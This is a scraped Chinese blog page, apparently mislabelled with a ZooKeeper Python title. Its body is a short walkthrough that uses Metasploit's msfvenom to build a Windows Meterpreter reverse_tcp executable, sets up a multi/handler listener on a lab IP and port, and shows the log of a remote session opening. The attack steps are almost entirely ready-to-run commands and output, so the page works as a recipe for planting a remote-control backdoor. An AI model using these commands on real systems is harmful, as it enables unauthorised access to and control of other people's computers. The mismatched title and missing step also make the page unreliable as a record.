zookeeper python接口实例详解
272
2022-10-11
Kali下Metasploit的shellcode在windows中的使用(kali安装metasploit命令)
1.kaili生成shellcode:root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe()2.侦听shellcode:
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.152.131 lhost => 192.168.152.131 msf exploit(multi/handler) > set lport 1211 lport => 1211 msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.152.131:1211
4.已经有session返回
msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.152.131:1211 [*] Sending stage (179779 bytes) to 192.168.152.129 [*] Meterpreter session 1 opened (192.168.152.131:1211 -> 192.168.152.129:1039) at 2018-02-24 07:58:44 +0000
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~